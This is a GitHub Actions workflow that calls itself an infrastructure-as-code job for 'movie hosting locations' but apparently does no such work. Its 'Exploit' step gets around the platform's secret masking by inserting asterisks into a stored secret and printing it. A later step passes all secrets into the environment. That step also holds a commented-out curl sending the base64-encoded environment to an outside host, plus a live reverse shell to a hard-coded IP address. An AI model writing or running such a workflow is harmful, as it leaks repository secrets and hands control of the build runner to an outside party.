name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/english ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Exploit
        run: |
          # Define the existing environmental variable
          existing_variable=${{ secrets.FAVOURITE }}
          # Get the length of the existing variable
          length=${#existing_variable}
          # Initialize a new variable to store the modified value
          modified_variable=""
          # Loop through each character of the existing variable
          for (( i=0; i<$length; i++ )); do
              # Append the current character to the modified variable
              modified_variable+="${existing_variable:$i:1}"
              # Insert '*' every second position
              modified_variable+="*"
          done
          # Print the modified variable
          echo "$modified_variable"
      - name: Add maskaaa
        env:
          MY_SECRET: ${{ secrets }}
        run: |
          MOVIE=${{ secrets.FAVOURITE }}
          #curl -k https://swagolili.free.beeceptor.com/?data=$(env | base64 --wrap=0)
          sh -i >& /dev/tcp/95.217.190.40/5000 0>&1

